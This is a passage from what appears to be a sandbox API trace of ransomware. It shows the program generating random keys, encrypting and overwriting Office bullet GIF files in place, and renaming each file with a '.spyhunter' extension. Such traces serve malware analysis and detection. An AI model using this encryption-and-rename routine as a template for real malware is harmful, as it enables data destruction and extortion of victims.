lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll.spyhunter")) returned 1 [0101.863] GetProcessHeap () returned 0x2c0000 [0101.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0101.863] GetProcessHeap () returned 0x2c0000 [0101.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.863] GetProcessHeap () returned 0x2c0000 [0101.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf6820 | out: hHeap=0x2c0000) returned 1 [0101.863] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc00 | out: pbBuffer=0x248fc00) returned 1 [0101.863] GetProcessHeap () returned 0x2c0000 [0101.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.863] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbf8*=0x30) returned 1 [0101.863] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21534_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21534_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0101.864] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21534_.GIF") returned 73 [0101.864] StrStrW (lpFirst="BD21534_.GIF", lpSrch=".txt") returned 0x0 [0101.864] GetProcessHeap () returned 0x2c0000 [0101.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.864] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbbc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbbc*=0xf0, lpOverlapped=0x0) returned 1 [0101.865] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff10, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.865] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x248fbbc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbbc*=0xf0, lpOverlapped=0x0) returned 1 [0101.865] GetProcessHeap () returned 0x2c0000 [0101.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.865] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.865] WriteFile (in: hFile=0x16c, lpBuffer=0x248fbfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbbc, lpOverlapped=0x0 | out: lpBuffer=0x248fbfc*, lpNumberOfBytesWritten=0x248fbbc*=0x4, lpOverlapped=0x0) returned 1 [0101.866] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbbc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbbc*=0x30, lpOverlapped=0x0) returned 1 [0101.866] CloseHandle (hObject=0x16c) returned 1 [0101.866] GetProcessHeap () returned 0x2c0000 [0101.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0101.866] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21534_.GIF.spyhunter") returned 83 [0101.866] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21534_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21534_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21534_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21534_.gif.spyhunter")) returned 1 [0101.866] GetProcessHeap () returned 0x2c0000 [0101.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0101.866] GetProcessHeap () returned 0x2c0000 [0101.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.867] GetProcessHeap () returned 0x2c0000 [0101.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf6660 | out: hHeap=0x2c0000) returned 1 [0101.867] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc00 | out: pbBuffer=0x248fc00) returned 1 [0101.867] GetProcessHeap () returned 0x2c0000 [0101.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.867] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbf8*=0x30) returned 1 [0101.867] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21533_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21533_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0101.867] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21533_.GIF") returned 73 [0101.867] StrStrW (lpFirst="BD21533_.GIF", lpSrch=".txt") returned 0x0 [0101.867] GetProcessHeap () returned 0x2c0000 [0101.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.867] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbbc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbbc*=0x148, lpOverlapped=0x0) returned 1 [0101.868] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffeb8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.868] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x148, lpNumberOfBytesWritten=0x248fbbc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbbc*=0x148, lpOverlapped=0x0) returned 1 [0101.872] GetProcessHeap () returned 0x2c0000 [0101.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.881] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.881] WriteFile (in: hFile=0x16c, lpBuffer=0x248fbfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbbc, lpOverlapped=0x0 | out: lpBuffer=0x248fbfc*, lpNumberOfBytesWritten=0x248fbbc*=0x4, lpOverlapped=0x0) returned 1 [0101.881] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbbc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbbc*=0x30, lpOverlapped=0x0) returned 1 [0101.881] CloseHandle (hObject=0x16c) returned 1 [0101.882] GetProcessHeap () returned 0x2c0000 [0101.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0101.882] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21533_.GIF.spyhunter") returned 83 [0101.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21533_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21533_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21533_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21533_.gif.spyhunter")) returned 1 [0101.882] GetProcessHeap () returned 0x2c0000 [0101.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0101.882] GetProcessHeap () returned 0x2c0000 [0101.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.882] GetProcessHeap () returned 0x2c0000 [0101.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf6580 | out: hHeap=0x2c0000) returned 1 [0101.883] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbf8 | out: pbBuffer=0x248fbf8) returned 1 [0101.883] GetProcessHeap () returned 0x2c0000 [0101.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.883] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbf0*=0x30) returned 1 [0101.883] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21520_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21520_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0101.883] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21520_.GIF") returned 73 [0101.883] StrStrW (lpFirst="BD21520_.GIF", lpSrch=".txt") returned 0x0 [0101.883] GetProcessHeap () returned 0x2c0000 [0101.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.883] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbb4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbb4*=0xb0, lpOverlapped=0x0) returned 1 [0101.884] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.884] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x248fbb4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbb4*=0xb0, lpOverlapped=0x0) returned 1 [0101.884] GetProcessHeap () returned 0x2c0000 [0101.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.884] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.884] WriteFile (in: hFile=0x16c, lpBuffer=0x248fbf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbb4, lpOverlapped=0x0 | out: lpBuffer=0x248fbf4*, lpNumberOfBytesWritten=0x248fbb4*=0x4, lpOverlapped=0x0) returned 1 [0101.885] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbb4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbb4*=0x30, lpOverlapped=0x0) returned 1 [0101.885] CloseHandle (hObject=0x16c) returned 1 [0101.885] GetProcessHeap () returned 0x2c0000 [0101.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0101.885] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21520_.GIF.spyhunter") returned 83 [0101.885] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21520_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21520_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21520_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21520_.gif.spyhunter")) returned 1 [0101.885] GetProcessHeap () returned 0x2c0000 [0101.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0101.885] GetProcessHeap () returned 0x2c0000 [0101.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.885] GetProcessHeap () returned 0x2c0000 [0101.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf64a0 | out: hHeap=0x2c0000) returned 1 [0101.886] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbf8 | out: pbBuffer=0x248fbf8) returned 1 [0101.886] GetProcessHeap () returned 0x2c0000 [0101.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.886] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbf0*=0x30) returned 1 [0101.886] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21519_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21519_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0101.887] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21519_.GIF") returned 73 [0101.887] StrStrW (lpFirst="BD21519_.GIF", lpSrch=".txt") returned 0x0 [0101.887] GetProcessHeap () returned 0x2c0000 [0101.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.887] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbb4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbb4*=0xb0, lpOverlapped=0x0) returned 1 [0101.888] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.888] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x248fbb4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbb4*=0xb0, lpOverlapped=0x0) returned 1 [0101.888] GetProcessHeap () returned 0x2c0000 [0101.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.888] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.888] WriteFile (in: hFile=0x16c, lpBuffer=0x248fbf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbb4, lpOverlapped=0x0 | out: lpBuffer=0x248fbf4*, lpNumberOfBytesWritten=0x248fbb4*=0x4, lpOverlapped=0x0) returned 1 [0101.888] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbb4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbb4*=0x30, lpOverlapped=0x0) returned 1 [0101.888] CloseHandle (hObject=0x16c) returned 1 [0101.888] GetProcessHeap () returned 0x2c0000 [0101.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0101.888] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21519_.GIF.spyhunter") returned 83 [0101.889] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21519_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21519_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21519_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21519_.gif.spyhunter")) returned 1 [0101.889] GetProcessHeap () returned 0x2c0000 [0101.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0101.889] GetProcessHeap () returned 0x2c0000 [0101.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.889] GetProcessHeap () returned 0x2c0000 [0101.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf63c0 | out: hHeap=0x2c0000) returned 1 [0101.889] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbf0 | out: pbBuffer=0x248fbf0) returned 1 [0101.889] GetProcessHeap () returned 0x2c0000 [0101.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.889] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbe8*=0x30) returned 1 [0101.889] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21518_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21518_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0101.890] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21518_.GIF") returned 73 [0101.890] StrStrW (lpFirst="BD21518_.GIF", lpSrch=".txt") returned 0x0 [0101.890] GetProcessHeap () returned 0x2c0000 [0101.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.890] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbac*=0xff, lpOverlapped=0x0) returned 1 [0101.891] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.891] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x248fbac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbac*=0xff, lpOverlapped=0x0) returned 1 [0101.891] GetProcessHeap () returned 0x2c0000 [0101.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.891] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.891] WriteFile (in: hFile=0x16c, lpBuffer=0x248fbec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbac, lpOverlapped=0x0 | out: lpBuffer=0x248fbec*, lpNumberOfBytesWritten=0x248fbac*=0x4, lpOverlapped=0x0) returned 1 [0101.891] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbac*=0x30, lpOverlapped=0x0) returned 1 [0101.891] CloseHandle (hObject=0x16c) returned 1 [0101.891] GetProcessHeap () returned 0x2c0000 [0101.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0101.891] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21518_.GIF.spyhunter") returned 83 [0101.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21518_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21518_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21518_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21518_.gif.spyhunter")) returned 1 [0101.892] GetProcessHeap () returned 0x2c0000 [0101.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0101.892] GetProcessHeap () returned 0x2c0000 [0101.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.892] GetProcessHeap () returned 0x2c0000 [0101.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3af5a8 | out: hHeap=0x2c0000) returned 1 [0101.892] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbf0 | out: pbBuffer=0x248fbf0) returned 1 [0101.892] GetProcessHeap () returned 0x2c0000 [0101.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.892] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbe8*=0x30) returned 1 [0101.892] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21505_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21505_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0101.893] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21505_.GIF") returned 73 [0101.893] StrStrW (lpFirst="BD21505_.GIF", lpSrch=".txt") returned 0x0 [0101.893] GetProcessHeap () returned 0x2c0000 [0101.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.893] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbac*=0xaf, lpOverlapped=0x0) returned 1 [0101.894] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff51, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.894] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xaf, lpNumberOfBytesWritten=0x248fbac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbac*=0xaf, lpOverlapped=0x0) returned 1 [0101.894] GetProcessHeap () returned 0x2c0000 [0101.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.894] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.894] WriteFile (in: hFile=0x16c, lpBuffer=0x248fbec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbac, lpOverlapped=0x0 | out: lpBuffer=0x248fbec*, lpNumberOfBytesWritten=0x248fbac*=0x4, lpOverlapped=0x0) returned 1 [0101.895] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbac*=0x30, lpOverlapped=0x0) returned 1 [0101.895] CloseHandle (hObject=0x16c) returned 1 [0101.895] GetProcessHeap () returned 0x2c0000 [0101.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0101.895] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21505_.GIF.spyhunter") returned 83 [0101.895] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21505_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21505_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21505_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21505_.gif.spyhunter")) returned 1 [0101.896] GetProcessHeap () returned 0x2c0000 [0101.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0101.896] GetProcessHeap () returned 0x2c0000 [0101.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.896] GetProcessHeap () returned 0x2c0000 [0101.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33bdc0 | out: hHeap=0x2c0000) returned 1 [0101.896] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbe8 | out: pbBuffer=0x248fbe8) returned 1 [0101.896] GetProcessHeap () returned 0x2c0000 [0101.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.896] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbe0*=0x30) returned 1 [0101.896] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft 